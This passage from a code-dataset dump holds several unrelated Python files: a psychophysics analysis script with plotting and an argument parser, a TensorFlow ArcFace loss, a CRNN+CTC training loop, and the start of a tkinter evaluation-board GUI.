{0}'.format(total_lo_nLL))\n\t\t#~ print('Overall linear mapping nLL = {0}'.format(total_li_nLL))\n\t\t#~ print('Percent of experiment,subject,session tuples that are better explained with the linear mapping = {0}%'.format(percent_of_low_li))\n\t\t#~ print('Mean log likelihood ratio in favor of linear mapping = {0}'.format(np.mean(log_likelihood_ratio)))\n\t\t#~ print('Likelihood ratio T-value = {0}'.format(np.exp(np.mean(log_likelihood_ratio))))\n\t\t#~ print('Likelihood ratio p-value = {0}'.format(0.5*(1-stats.t.cdf(np.exp(np.mean(log_likelihood_ratio)),1))))\n\t\t#~ print('Total double log likelihood ratio = {0}'.format(2*np.sum(log_likelihood_ratio)))\n\t\t#~ print('Total log likelihood ratio Wilk´s p-value = {0}'.format(0.5*(1-stats.chi2.cdf(2*np.sum(log_likelihood_ratio),1))))\n\t\t\n\t\t#~ plt.hist(log_likelihood_ratio)\n\t\t#~ plt.xlabel('nLL(log_odds)-nLL(linear)')\n\t\t#~ plt.show(True)\n\t\toutput.append([str(ucat).replace(' x00',''),'{0:.2f}'.format(total_lo_nLL),'{0:.2f}'.format(total_li_nLL),'{0:.2f}'.format(2*np.sum(log_likelihood_ratio))])\n\toutput.append([u'All','{0:.2f}'.format(all_lo_nLL),'{0:.2f}'.format(all_li_nLL),'{0:.2f}'.format(2*(all_lo_nLL-all_li_nLL))])\n\toutput = ' \\\\\\\\ \\\\hline\\n'.join([' & '.join(x) for x in output])+' \\\\\\\\ \\\\hline\\n'\n\tprint(output)\n\ndef mapping_strengths_and_weaknesses(analyzer_kwargs={}):\n\tlinear_kwargs = analyzer_kwargs.copy()\n\tlinear_kwargs['cmap_meth'] = 'belief'\n\tlog_odds_kwargs = analyzer_kwargs.copy()\n\tlog_odds_kwargs['cmap_meth'] = 'log_odds'\n\tali = Analyzer(**linear_kwargs)\n\talo = Analyzer(**log_odds_kwargs)\n\texpli,teoli = ali.get_summary_stats_array()\n\texplo,teolo = alo.get_summary_stats_array()\n\tcompared_keys = ['rt_mean', 'hit_rt_mean', 'miss_rt_mean',\n\t\t\t\t\t 'auc', 'confidence_mean',\n\t\t\t\t\t 'hit_confidence_mean', 'miss_confidence_mean']\n\t\n\tplt.figure(figsize=(11,8))\n\tgs0 = gridspec.GridSpec(2,1,left=0.08, right=0.98,hspace=0.35, bottom=0.10, top=0.95)\n\tgs00 = gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0])\n\tgs10 = gridspec.GridSpecFromSubplotSpec(1, 4, subplot_spec=gs0[1])\n\tcompared_keys_axes = [gs00[0],gs00[1],gs00[2],\n\t\t\t\t\t\t gs10[0],gs10[1],gs10[2],gs10[3]]\n\tcompared_keys_titles = [r'$\\left\\langle RT\\right\\rangle$', r'$\\left\\langle RT|hit\\right\\rangle$', r'$\\left\\langle RT|miss\\right\\rangle$',\n\t\t\t\t\t 'AUC', r'$\\left\\langle conf\\right\\rangle$',\n\t\t\t\t\t r'$\\left\\langle conf|hit\\right\\rangle$', r'$\\left\\langle conf|miss\\right\\rangle$']\n\tcompared_keys_xlabels = ['Theoretical']*7\n\tcompared_keys_ylabels = ['Experimental','','','Experimental','','','']\n\tsuppressed_yticklabels = [False,True,True,\n\t\t\t\t\t\t False,False,True,True]\n\taxp = None\n\taxs = []\n\tuexp = np.unique(teoli['experiment'])\n\tfor k,gs,tit,xlabel,ylabel,sup_tick in zip(compared_keys,compared_keys_axes,compared_keys_titles,compared_keys_xlabels,compared_keys_ylabels,suppressed_yticklabels):\n\t\tif not sup_tick:\n\t\t\tax = plt.subplot(gs)\n\t\telse:\n\t\t\tax = plt.subplot(gs,sharex=axp,sharey=axp)\n\t\tif k.endswith('_mean'):\n\t\t\tax.errorbar(teoli[k],expli[k],yerr=expli[k.replace('_mean','_std')],fmt='.b')\n\t\t\tax.errorbar(teolo[k],explo[k],explo[k.replace('_mean','_std')],fmt='.r')\n\t\telse:\n\t\t\tax.plot(teoli[k],expli[k],'ob')\n\t\t\tax.plot(teolo[k],explo[k],'or')\n\t\tax.set_title(tit)\n\t\tax.set_xlabel(xlabel)\n\t\tax.set_ylabel(ylabel)\n\t\tif sup_tick:\n\t\t\tax.tick_params(labelleft=False)\n\t\telse:\n\t\t\taxp = ax\n\t\tif k=='rt_mean':\n\t\t\tax.legend([r'$\\mathcal{L}(\\mathcal{C}_{s})$',r'$\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})$'],loc='best', fancybox=True, framealpha=0.5)\n\t\taxs.append(ax)\n\tfor ax in axs:\n\t\tlims = [0,0]\n\t\tlims[0] = np.min([ax.get_xlim()[0],ax.get_ylim()[0]])\n\t\tlims[1] = np.max([ax.get_xlim()[1],ax.get_ylim()[1]])\n\t\tax.plot(lims,lims,'--k')\n\t\tax.set_xlim(lims)\n\t\tax.set_ylim(lims)\n\t\n\t#~ chi2li = []\n\t#~ chi2lo = []\n\t#~ for k in compared_keys:\n\t\t#~ if k.endswith('_mean'):\n\t\t\t#~ chi2li.append(np.sum((teoli[k]-expli[k]/expli[k.replace('_mean','_std')])**2))\n\t\t\t#~ chi2lo.append(np.sum((teolo[k]-explo[k]/explo[k.replace('_mean','_std')])**2))\n\t\t#~ else:\n\t\t\t#~ chi2li.append(np.sum((teoli[k]-expli[k])**2))\n\t\t\t#~ chi2lo.append(np.sum((teolo[k]-explo[k])**2))\n\t#~ chi2li = np.array(chi2li)\n\t#~ chi2lo = np.array(chi2lo)\n\t#~ plt.figure()\n\t#~ plt.subplot(121)\n\t#~ plt.bar(np.arange(len(chi2li)),chi2li/(chi2li+chi2lo),width=0.45,color='b')\n\t#~ plt.bar(np.arange(len(chi2lo))+0.45,chi2lo/(chi2li+chi2lo),width=0.40,color='r')\n\t#~ plt.subplot(122)\n\t#~ plt.bar(np.arange(len(chi2lo)),chi2li-chi2lo,color='r')\n\t#~ print((chi2li-chi2lo)[3])\n\t\n\tplt.figure(figsize=(11,8))\n\tcompared_keys_xlabels = [r'$\\left\\langle RT\\right\\rangle_{theo}-\\left\\langle RT\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle RT|hit\\right\\rangle_{theo}-\\left\\langle RT|hit\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle RT|miss\\right\\rangle_{theo}-\\left\\langle RT|miss\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'AUC$_{theo}$-AUC$_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle conf\\right\\rangle_{theo}-\\left\\langle conf\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle conf|hit\\right\\rangle_{theo}-\\left\\langle conf|hit\\right\\rangle_{exp}$',\n\t\t\t\t\t\t\tr'$\\left\\langle conf|miss\\right\\rangle_{theo}-\\left\\langle conf|miss\\right\\rangle_{exp}$']\n\t\n\tcompared_keys_ylabels = ['Count','','','Count','','','']\n\tfor k,gs,xlabel,ylabel,sup_tick in zip(compared_keys,compared_keys_axes,compared_keys_xlabels,compared_keys_ylabels,suppressed_yticklabels):\n\t\t#~ print(k)\n\t\tif not sup_tick:\n\t\t\tax = plt.subplot(gs)\n\t\telse:\n\t\t\tax = plt.subplot(gs,sharey=axp)\n\t\tedges = np.histogram(np.array([teoli[k]-expli[k],teolo[k]-explo[k]]),bins=20)[1]\n\t\tcenters = np.array([0.5*(e1+e0) for e1,e0 in zip(edges[1:],edges[:-1])])\n\t\thistli = np.histogram(teoli[k]-expli[k],bins=edges,density=True)[0]\n\t\thistlo = np.histogram(teolo[k]-explo[k],bins=edges,density=True)[0]\n\t\tax.step(edges,np.hstack((histli,histli[-1:])),'b',where='post')\n\t\tax.step(edges,np.hstack((histlo,histlo[-1:])),'r',where='post')\n\t\ttli = [0]\n\t\ttlo = [0]\n\t\tpli = [0]\n\t\tplo = [0]\n\t\ttli[0],pli[0] = stats.ttest_1samp(teoli[k]-expli[k],0.)\n\t\ttlo[0],plo[0] = stats.ttest_1samp(teolo[k]-explo[k],0.)\n\t\tfor exp in uexp:\n\t\t\tindsli = teoli['experiment']==exp\n\t\t\tindslo = teolo['experiment']==exp\n\t\t\ttemp1,temp2 = stats.ttest_1samp(teoli[k][indsli]-expli[k][indsli],0.)\n\t\t\ttli.append(temp1)\n\t\t\tpli.append(temp2)\n\t\t\ttemp1,temp2 = stats.ttest_1samp(teolo[k][indslo]-explo[k][indslo],0.)\n\t\t\ttlo.append(temp1)\n\t\t\tplo.append(temp2)\n\t\tpv = np.array([np.array(pli),np.array(plo)])\n\t\tpv = utils.holm_bonferroni(pv)\n\t\tprint(pv.reshape((2,-1)).T)\n\t\tprint('{0}, {1} ({2}), {3} ({4})'.format(k,tli[0],pli[0],tlo[0],plo[0]))\n\t\tfor i,exp in enumerate(uexp):\n\t\t\tprint('{0} ({5}), {1} ({2}), {3} ({4})'.format(k,tli[1+i],pli[1+i],tlo[1+i],plo[1+i],exp))\n\t\tlims = list(ax.get_ylim())\n\t\tlims[0] = 0.\n\t\tax.set_ylim(lims)\n\t\tax.set_xlabel(xlabel)\n\t\tax.set_ylabel(ylabel)\n\t\tif sup_tick:\n\t\t\tax.tick_params(labelleft=False)\n\t\telse:\n\t\t\taxp = ax\n\t\tif k=='rt_mean':\n\t\t\tax.legend([r'$\\mathcal{L}(\\mathcal{C}_{s})$',r'$\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})$'],loc='best', fancybox=True, framealpha=0.5)\n\t\n\tplt.show(True)\n\ndef test():\n\tmapping_strengths_and_weaknesses()\n\t#~ compare_mappings()\n\treturn\n\ta = Analyzer(cmap_meth='belief')\n\ta.get_parameter_array_from_summary(normalize={'internal_var':'experiment','dead_time':'name','dead_time_sigma':'session'})\n\ttree = a.cluster(merge='names',clustered_parameters=['high_confidence_threshold','confidence_map_slope'])\n\t#~ tree.copy().render('cluster_test.svg',tree_style=default_tree_style(mode='r'), layout=default_tree_layout)\n\ttree.show(tree_style=default_tree_style(mode='r'))\n\ttree = a.cluster(merge='sessions',clustered_parameters=['high_confidence_threshold','confidence_map_slope'])\n\t#~ tree.copy().render('cluster_test.svg',tree_style=default_tree_style(mode='c'), layout=default_tree_layout)\n\ttree.show(tree_style=default_tree_style(mode='c'))\n\ttree = a.cluster(clustered_parameters=['high_confidence_threshold','confidence_map_slope'])\n\t#~ tree.copy().render('cluster_test.svg',tree_style=default_tree_style(mode='c'), layout=default_tree_layout)\n\ttree.show(tree_style=default_tree_style(mode='c'))\n\ta.scatter_parameters(show=True)\n\ta.scatter_parameters(merge='names',show=True)\n\ta.scatter_parameters(merge='sessions',show=True)\n\ta.set_pooling_func(np.median)\n\ta.scatter_parameters(show=True)\n\ta.scatter_parameters(merge='names',show=True)\n\ta.scatter_parameters(merge='sessions',show=True)\n\t#~ unams,indnams = np.unique(a._names,return_inverse=True)\n\t#~ uexps,indexps = np.unique(a._experiments,return_inverse=True)\n\t#~ usess,indsess = np.unique(a._sessions,return_inverse=True)\n\t\n\t#~ for un in unams:\n\t\t#~ inds = a._names==un\n\t\t#~ pars = a._parameters[inds]\n\t\t#~ cost = pars[:,a._parameter_names.index('cost')]\n\t\t#~ internal_var = pars[:,a._parameter_names.index('internal_var')]\n\t\t#~ phase_out_prob = pars[:,a._parameter_names.index('phase_out_prob')]\n\t\t#~ high_confidence_threshold = pars[:,a._parameter_names.index('high_confidence_threshold')]\n\t\t#~ confidence_map_slope = pars[:,a._parameter_names.index('confidence_map_slope')]\n\t\t#~ plt.figure(figsize=(10,10))\n\t\t#~ ax1 = plt.subplot(221)\n\t\t#~ ax2 = plt.subplot(222)\n\t\t#~ ax3 = plt.subplot(223)\n\t\t#~ ax4 = plt.subplot(224)\n\t\t#~ for us,marker in zip(usess,['o','s','D']):\n\t\t\t#~ inds2 = a._sessions[inds]==us\n\t\t\t#~ if any(inds2):\n\t\t\t\t#~ colors = [{'2AFC':'r','Auditivo':'g','Luminancia':'b'}[str(x).strip('\\x00')] for x in a._experiments[inds][inds2]]\n\t\t\t\t#~ ax1.scatter(cost[inds2],internal_var[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t\t\t#~ ax2.scatter(cost[inds2],phase_out_prob[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t\t\t#~ ax3.scatter(internal_var[inds2],phase_out_prob[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t\t\t#~ ax4.scatter(confidence_map_slope[inds2],high_confidence_threshold[inds2],c=colors,s=20,label=us,marker=marker)\n\t\t#~ ax1.set_xlabel('cost')\n\t\t#~ ax1.set_ylabel('internal_var')\n\t\t#~ ax2.set_xlabel('cost')\n\t\t#~ ax2.set_ylabel('phase_out_prob')\n\t\t#~ ax3.set_xlabel('internal_var')\n\t\t#~ ax3.set_ylabel('phase_out_prob')\n\t\t#~ ax3.legend()\n\t\t#~ ax4.set_xlabel('confidence_map_slope')\n\t\t#~ ax4.set_ylabel('high_confidence_threshold')\n\t\t#~ plt.suptitle('Subject: '+str(un))\n\t\t#~ plt.show(True)\n\ndef parse_input():\n\tscript_help = \"\"\" moving_bounds_fits.py help\n Sintax:\n moving_bounds_fits.py [option flag] [option value]\n \n moving_bounds_fits.py -h [or --help] displays help\n \n Optional arguments are:\n '--show': This flag takes no values. If present it displays the plotted figure\n and freezes execution until the figure is closed.\n '--test': This flag takes no values. If present the script's testsuite is\n executed.\n '-w': Override the existing saved summary file. If the flag '-w' is\n supplied, the script will override the saved summary file. If this\n flag is not supplied, the script will attempt to load the summary\n and if it fails, it will produce the summary file. WARNING:\n the generation of the summary file takes a very long time.\n '-m' or '--method': String that identifies the fit method. Available values are full,\n confidence_only and full_confidence. [Default 'full_confidence']\n '-o' or '--optimizer': String that identifies the optimizer used for fitting.\n Available values are 'cma' and all the scipy.optimize.minimize methods.\n [Default 'cma']\n '-sf' or '--suffix': A string suffix to paste to the filenames. [Default '']\n '-e' or '--extension': A string that determines the graphics fileformat\n in which the tree graph will be saved. Available\n extensions are 'pdf', 'png' or 'svg'. [Default 'svg']\n '-n' or '--n_clusters': An integer that specifies the number of clusters\n constructed by the scikit-learn AgglomerativeClustering\n class. [Default 2]\n '-a' or '--affinity': The scikit-learn AgglomerativeClustering class affinity\n posible values are 'euclidean', 'l1', 'l2', 'cosine',\n 'manhattan' or 'precomputed'. If linkage is 'ward',\n only 'euclidean' is accepted. Refer to the scikit-learn\n documentation for more information. [Default 'euclidean']\n '-l' or '--linkage': The scikit-learn AgglomerativeClustering class linkage\n posible values are 'ward', 'complete' or 'average'.\n Refer to the scikit-learn documentation for more\n information. [Default 'ward']\n '-pf' or '--pooling_func': The scikit-learn AgglomerativeClustering class pooling_func.\n Default is np.nanmean (notice that numpy is\n aliased as np when supplying an option).\n The pooling_func is also used when scattering\n the parameters but this functionality is only\n accesible when importing the analysis.py package).\n '--merge': Can be 'none', 'experiments', 'sessions' or 'names'. This option\n controls if the fitted model parameters should be pooled together\n or not, and how they should be pooled. If 'None', the parameters are not\n pooled together. The parameters have three separate categories:\n the experiment to which they belong, the subject name and the\n experimental session. If the supplied option value is 'experiments',\n 'sessions' or 'names', the parameters that belong to different\n categories of the supplied option value will be pooled together\n using the pooling_func. For example, if the option value is\n 'names', the parameters for will still distinguish the experiment\n and session, but the parameters for different subject names will\n be pooled together. [Default 'names']\n '-f' or '--filter_nans': Can be 'pre', 'post' or 'none'. This option controls\n how to filter the parameters that are nans. If 'none',\n no filter is applied. If 'pre', the parameters\n that contain a nan entry are filtered before\n reducing the parameters to the clustered parameter\n space. If 'post', the parameters that contain a\n nan entry are filtered after the reduction takes\n place. [Default 'post']\n '-t' or '--tree_mode': Can be 'r' or 'c' and controls how to plot the\n cluster hierarchy. If 'r', the tree is plotted\n in rectangular mode. If 'c', the tree is plotted\n in circular mode.\n Example:\n python analysis.py --show -pf np.nanmedian\"\"\"\n\tstr_caster = lambda x: str(x).lower()\n\tint_caster = int\n\tevaler = eval\n\tavailable_options_casters = {'method':str_caster,\\\n\t\t\t\t\t\t\t\t'optimizer':str_caster,\\\n\t\t\t\t\t\t\t\t'suffix':str_caster,\\\n\t\t\t\t\t\t\t\t'extension':str_caster,\\\n\t\t\t\t\t\t\t\t'override':None,\\\n\t\t\t\t\t\t\t\t'n_clusters':int_caster,\\\n\t\t\t\t\t\t\t\t'affinity':str_caster,\\\n\t\t\t\t\t\t\t\t'linkage':str_caster,\\\n\t\t\t\t\t\t\t\t'pooling_func':evaler,\\\n\t\t\t\t\t\t\t\t'merge':str_caster,\\\n\t\t\t\t\t\t\t\t'filter_nans':str_caster,\\\n\t\t\t\t\t\t\t\t'tree_mode':str_caster,\\\n\t\t\t\t\t\t\t\t'show':None,\\\n\t\t\t\t\t\t\t\t'test':None}\n\toptions = {'test':False,'override':False,'show':False}\n\texpecting_key = True\n\tkey = None\n\tif len(sys.argv)==1:\n\t\toptions['test'] = True\n\tfor i,arg in enumerate(sys.argv[1:]):\n\t\tif expecting_key:\n\t\t\tif arg=='--test':\n\t\t\t\toptions['test'] = True\n\t\t\telif arg=='-w' or arg=='--override':\n\t\t\t\toptions['override'] = True\n\t\t\telif arg=='--show':\n\t\t\t\toptions['show'] = True\n\t\t\telif arg=='-m' or arg=='--method':\n\t\t\t\tkey = 'method'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-o' or arg=='--optimizer':\n\t\t\t\tkey = 'optimizer'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-sf' or arg=='--suffix':\n\t\t\t\tkey = 'suffix'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-e' or arg=='--extension':\n\t\t\t\tkey = 'extension'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-n' or arg=='--n_clusters':\n\t\t\t\tkey = 'n_clusters'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-a' or arg=='--affinity':\n\t\t\t\tkey = 'affinity'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-l' or arg=='--linkage':\n\t\t\t\tkey = 'linkage'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-pf' or arg=='--pooling_func':\n\t\t\t\tkey = 'pooling_func'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='--merge':\n\t\t\t\tkey = 'merge'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-f' or arg=='--filter_nans':\n\t\t\t\tkey = 'filter_nans'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-t' or arg=='--tree_mode':\n\t\t\t\tkey = 'tree_mode'\n\t\t\t\texpecting_key = False\n\t\t\telif arg=='-h' or arg=='--help':\n\t\t\t\tprint(script_help)\n\t\t\t\tsys.exit()\n\t\t\telse:\n\t\t\t\traise RuntimeError(\"Unknown option: {opt} encountered in position {pos}. Refer to the help to see the list of options\".format(opt=arg,pos=i+1))\n\t\telse:\n\t\t\texpecting_key = True\n\t\t\toptions[key] = available_options_casters[key](arg)\n\ttry:\n\t\tif options['merge']=='none':\n\t\t\toptions['merge'] = None\n\texcept:\n\t\tpass\n\tif not expecting_key:\n\t\traise RuntimeError(\"Expected a value after encountering key '{0}' but no value was supplied\".format(arg))\n\treturn options\n\nif __name__==\"__main__\":\n\t# Parse input from sys.argv\n\toptions = parse_input()\n\tif options['test']:\n\t\ttest()\n\telse:\n\t\tdel options['test']\n\t\tcluster_analysis(**options)\n","sub_path":"src/subject_data_analisis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":109286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"627976534","text":"import tensorflow as tf\nimport math\n\n\ndef arcface_loss(embedding, labels, out_num, w_init=None, s=64.,\n m=0.5): # embedding=emb, labels=labels, w_init=w_init_method, out_num=num_classes\n '''\n :param embedding: the input embedding vectors\n :param labels: the input labels, the shape should be eg: (batch_size, 1)\n :param s: scalar value default is 64\n :param out_num: output class num\n :param m: the margin value, default is 0.5\n :return: the final cacualted output, this output is send into the tf.nn.softmax directly\n '''\n cos_m = math.cos(m)\n sin_m = math.sin(m) # cos(θ+m)=cosθcosm−sinθsinm\n # mm = sin_m * m # issue 1 ?\n threshold = math.cos(math.pi - m) # ?\n with tf.variable_scope('arcface_loss'):\n # inputs and weights norm\n embedding_norm = tf.norm(embedding, axis=1,\n keep_dims=True) # 特征值归一化,(?,1),默认情况下是计算欧氏距离的L2范数(向量的摩长||x||,向量点到原点的距离), axis为按哪个维度计算范数,可取0或1,0代表列,1代表行\n embedding = tf.div(embedding, embedding_norm,\n name='norm_embedding') # (?,512)/(?,1) = (?,512),emb/||x|| = emb_new, ||emb_new||=1,只保留方向向量,摩长=1\n weights = tf.get_variable(name='embedding_weights', shape=(embedding.get_shape().as_list()[-1], out_num),\n initializer=w_init,\n dtype=tf.float32) # 如果已存在参数定义相同的变量,就返回已存在的变量,否则创建由参数定义的新变量。w_init_method = tf.contrib.layers.xavier_initializer(uniform=False)这个初始化器是用来保持每一层的梯度��小都差不多相同。\n weights_norm = tf.norm(weights, axis=0, keep_dims=True) # (1, 85742) ,特征值取出后进行归一化,去除长度影响,只保留角度信息。\n weights = tf.div(weights, weights_norm, name='norm_weights') # (512, 85742)/(1, 85742)=(512, 85742)\n # cos(theta+m)\n cos_t = tf.matmul(embedding, weights, name='cos_t') # 点乘 x*w =(?,512) *(512, 85742) = (?,85742),由于x和权重都做了归一化所以,X*W=|x|*|w|cos = |1||1|cos=cos\n cos_t2 = tf.square(cos_t, name='cos_2') # (?,85742)\n sin_t2 = tf.subtract(1., cos_t2, name='sin_2') # (?,85742) (1)三角函数公式 sin方=1-cos方\n sin_t = tf.sqrt(sin_t2, name='sin_t') # (?,85742) ,(2)从而得到sin = 根号(sin2)\n cos_mt = s * tf.subtract(tf.multiply(cos_t, cos_m), tf.multiply(sin_t, sin_m),\n name='cos_mt') # (?,85742) cos(t+m)=cos_t * cos_m - sin_t * sin_m ,即coscos - sinsin\n\n # this condition controls the theta+m should in range [0, pi] ???\n # 0<=theta+m<=pi\n # -m<=theta<=pi-m\n cond_v = cos_t - threshold # (?,85742)\n cond = tf.cast(tf.nn.relu(cond_v, name='if_else'), dtype=tf.bool) # 布尔量,(?,85742),正数为True,其他为False\n\n keep_val = s * (cos_t - sin_m * m) # (?,85742) ??\n cos_mt_temp = tf.where(cond, cos_mt,\n keep_val) # 在cos_mt里面挑选的cond为True位置,在keep_val里面挑选的cond为Falese位置,对应位置放数-组成新的矩阵\n\n mask = tf.one_hot(labels, depth=out_num, name='one_hot_mask') # (?,85742)\n # mask = tf.squeeze(mask, 1)\n inv_mask = tf.subtract(1., mask, name='inverse_mask') # (?,85742)\n\n s_cos_t = tf.multiply(s, cos_t, name='scalar_cos_t') # (?,85742)扩大球面面积,是的各类别label分布更分散,从而更好找到边界\n\n output = tf.add(tf.multiply(s_cos_t, inv_mask), tf.multiply(cos_mt_temp, mask),\n name='arcface_loss_output') # (?,85742)\n return output\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"630617115","text":"from data import *\nfrom crnn_model import crnn\nimport shutil\nimport os\nimport numpy as np\nfrom PIL import Image\n\ndef change_shape_to_32(img):\n h, w = img.shape[0], img.shape[1]\n scale = 32/h\n img = Image.fromarray(img)\n img = img.resize((int(w*scale),32))\n img = np.array(img)\n img = np.expand_dims(img,0)\n return img\n\ntrain_lr_init = 1e-3\ntrain_lr_end = 1e-6\ntrainset = crnn_data()\nlogdir = \"E:/github_zdxf/tensorflow_learning/ctpn/log_ctc\"\nglobal_steps = tf.Variable(1, trainable=False, dtype=tf.int64)\nwarmup_steps = 2 * 100000\ntotal_steps = 30 * 100000\ninput_tensor = tf.keras.layers.Input([32,None,3])\noutput_tensor = crnn(input_tensor,128,512)\nmodel = tf.keras.Model(input_tensor, output_tensor)\n# model.load_weights('E:\\github_zdxf\\yolo_qqwweee\\keras-yolo3\\model_data\\yolo.h5',by_name=True,skip_mismatch=True)\noptimizer = tf.keras.optimizers.Adam()\nif os.path.exists(logdir): shutil.rmtree(logdir)\nwriter = tf.summary.create_file_writer(logdir)\ndef train_step(image_data, target, label_length, logit_length):\n with tf.GradientTape() as tape:\n pred_result = model(image_data, training=True)\n total_loss = tf.nn.ctc_loss(target,pred_result,label_length,logit_length,logits_time_major=False)\n\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n tf.print(\"=> STEP %4d lr: %.16f total_loss: %4.12f\" %(global_steps, optimizer.lr.numpy(),total_loss))\n # update learning rate\n global_steps.assign_add(1)\n if global_steps < warmup_steps:\n lr = global_steps / warmup_steps *train_lr_init\n else:\n lr = train_lr_end + 0.5 * (train_lr_init - train_lr_end) * (\n (1 + tf.cos((global_steps - warmup_steps) / (total_steps - warmup_steps) * np.pi))\n )\n optimizer.lr.assign(lr.numpy())\n\n # writing summary data\n with writer.as_default():\n tf.summary.scalar(\"lr\", optimizer.lr, step=global_steps)\n tf.summary.scalar(\"loss/total_loss\", total_loss.numpy()[0], step=global_steps)\n\n writer.flush()\n\n\nfor epoch in range(30):\n for ll in trainset:\n if ll != 'error!' and ll != None:\n sequence, img = ll\n img = change_shape_to_32(img)\n label_length = sequence.shape[0]\n sequence = np.array(sequence).T\n logit_length = int(img.shape[1]//4)\n train_step(img,sequence,[label_length],[logit_length])\n if int(global_steps.value().numpy()) % 100 == 0:\n model.save_weights(\"E:/github_zdxf/weights/crnn+ctc_weights/{}_{}.h5\".format(epoch,int(global_steps.value().numpy())))\n model.save_weights(\"E:/github_zdxf/weights/crnn+ctc_weights/{}.h5\".format(epoch))\n\n\n\n","sub_path":"ctpn/train_crnn+ctc.py","file_name":"train_crnn+ctc.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"383098325","text":"import tkinter\nimport socket\nimport asyncio\nimport nest_asyncio\nimport threading\n\nBLOCK = True\n\n\nclass Evb(tkinter.Frame):\n\n def __init__(self, main, connection):\n tkinter.Frame.__init__(self, main)\n self.__main_window = main\n self.__main_window.geometry(\"1000x612\")\n self.__main_window.resizable(0, 0)\n self.__main_window.title('evb')\n self.__connection = connection\n self.__window_background_img = tkinter.PhotoImage(file=\"Przechwytywanie.PNG\")\n self.__pixel = tkinter.PhotoImage(width=1, height=1)\n self.__text_var = \" \"\n self.__led = []\n self.__lcd = None\n self.__rgb = None\n nest_asyncio.apply()\n self.loop()\n\n def th(self, loop):\n loop.run_until_complete(self.led_loop())\n\n def th2(self, loop2):\n loop2.run_until_complete(self.text_loop())\n\n def th3(self, loop3):\n loop3.run_until_complete(self.rgb_loop())\n\n def loop(self):\n window_background = tkinter.Label(self.__main_window)\n window_background.config(image=self.__window_background_img)\n window_background.place(relwidth=1, relheight=1)\n button1 = tkinter.Button(self.__main_window, text='1', command=lambda: self.click(0),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button1.place(relx=0.547, rely=0.943, anchor=tkinter.CENTER)\n button2 = tkinter.Button(self.__main_window, text='2', command=lambda: self.click(1),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button2.place(relx=0.5815, rely=0.943, anchor=tkinter.CENTER)\n button3 = tkinter.Button(self.__main_window, text='3', command=lambda: self.click(2),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button3.place(relx=0.616, rely=0.943, anchor=tkinter.CENTER)\n button4 = tkinter.Button(self.__main_window, text='4', command=lambda: self.click(3),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button4.place(relx=0.6505, rely=0.943, anchor=tkinter.CENTER)\n button5 = tkinter.Button(self.__main_window, text='5', command=lambda: self.click(4),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button5.place(relx=0.685, rely=0.943, anchor=tkinter.CENTER)\n button6 = tkinter.Button(self.__main_window, text='6', command=lambda: self.click(5),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button6.place(relx=0.7195, rely=0.943, anchor=tkinter.CENTER)\n button7 = tkinter.Button(self.__main_window, text='7', command=lambda: self.click(6),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button7.place(relx=0.754, rely=0.943, anchor=tkinter.CENTER)\n button8 = tkinter.Button(self.__main_window, text='8', command=lambda: self.click(7),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button8.place(relx=0.7885, rely=0.943, anchor=tkinter.CENTER)\n volume_button1 = tkinter.Button(self.__main_window, text='-', command=lambda: self.f1(1),\n compound=tkinter.CENTER, image=self.__pixel, width=1, height=20)\n volume_button1.place(relx=0.836, rely=0.947, anchor=tkinter.CENTER)\n volume_button2 = tkinter.Button(self.__main_window, text='+', command=lambda: self.f1(2),\n compound=tkinter.CENTER, image=self.__pixel, width=1, height=20)\n volume_button2.place(relx=0.864, rely=0.947, anchor=tkinter.CENTER)\n self.__lcd = tkinter.Label(self.__main_window, bg='grey', text=self.__text_var, width=57, height=7)\n self.__lcd.place(relx=0.718, rely=0.24, anchor=tkinter.CENTER)\n\n for i in range(8):\n led = tkinter.Label(self.__main_window, bg=\"#003200\", image=self.__pixel, width=8, height=15)\n self.__led.append(led)\n led.place(relx=0.4207 + i * 0.0174, rely=0.573, anchor=tkinter.CENTER)\n\n self.__rgb = tkinter.Label(self.__main_window, bg=\"#ffff9f\", image=self.__pixel, width=35, height=35)\n self.__rgb.place(relx=0.587, rely=0.549, anchor=tkinter.CENTER)\n l1 = asyncio.get_event_loop()\n l2 = asyncio.get_event_loop()\n l3 = asyncio.get_event_loop()\n threading.Thread(target=self.th, args=(l1,)).start()\n threading.Thread(target=self.th2, 